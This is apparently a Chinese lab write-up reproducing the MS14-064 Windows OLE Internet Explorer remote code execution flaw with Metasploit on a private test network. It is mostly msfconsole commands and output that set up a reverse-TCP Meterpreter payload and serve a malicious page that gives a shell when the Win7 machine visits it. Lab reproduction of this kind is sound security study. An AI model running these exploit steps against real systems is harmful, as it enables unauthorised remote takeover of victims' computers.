背景
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本…
模块:exploit/windows/browser/ms14_064_ole_code_execution
复现
| 系统 | IP |
|---|---|
| linux | 10.7.10.43 |
| win7 | 10.7.10.49 |
msf6 > search ms14-064
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/browser/ms14_064_ole_code_execution 2014-11-13 good No MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution
1 exploit/windows/fileformat/ms14_064_packager_python 2014-11-12 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python
2 exploit/windows/fileformat/ms14_064_packager_run_as_admin 2014-10-21 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/fileformat/ms14_064_packager_run_as_admin
msf6 > use exploit/windows/browser/ms14_064_ole_code_execution
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > ifconfig
[*] exec: ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.7.10.43 netmask 255.255.255.0 broadcast 10.7.10.255
inet6 fe80::20c:29ff:fe3d:e7e0 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:3d:e7:e0 txqueuelen 1000 (Ethernet)
RX packets 72244 bytes 6467761 (6.1 MiB)
RX errors 0 dropped 34923 overruns 0 frame 0
TX packets 51553 bytes 7628452 (7.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1380 bytes 120208 (117.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1380 bytes 120208 (117.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set AllowPowershellPrompt true
AllowPowershellPrompt => true
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > show options
Module options (exploit/windows/browser/ms14_064_ole_code_execution):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowPowershellPrompt true yes Allow exploit to try Powershell
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TRYUAC false yes Ask victim to start as Administrator
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.7.10.43 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > exploit
得到的网址,在win7上访问一下返回shell
参考文章:
https://www.cnblogs.com/5301z/p/6714300.html
https://blog.csdn.net/nzjdsds/article/details/81912349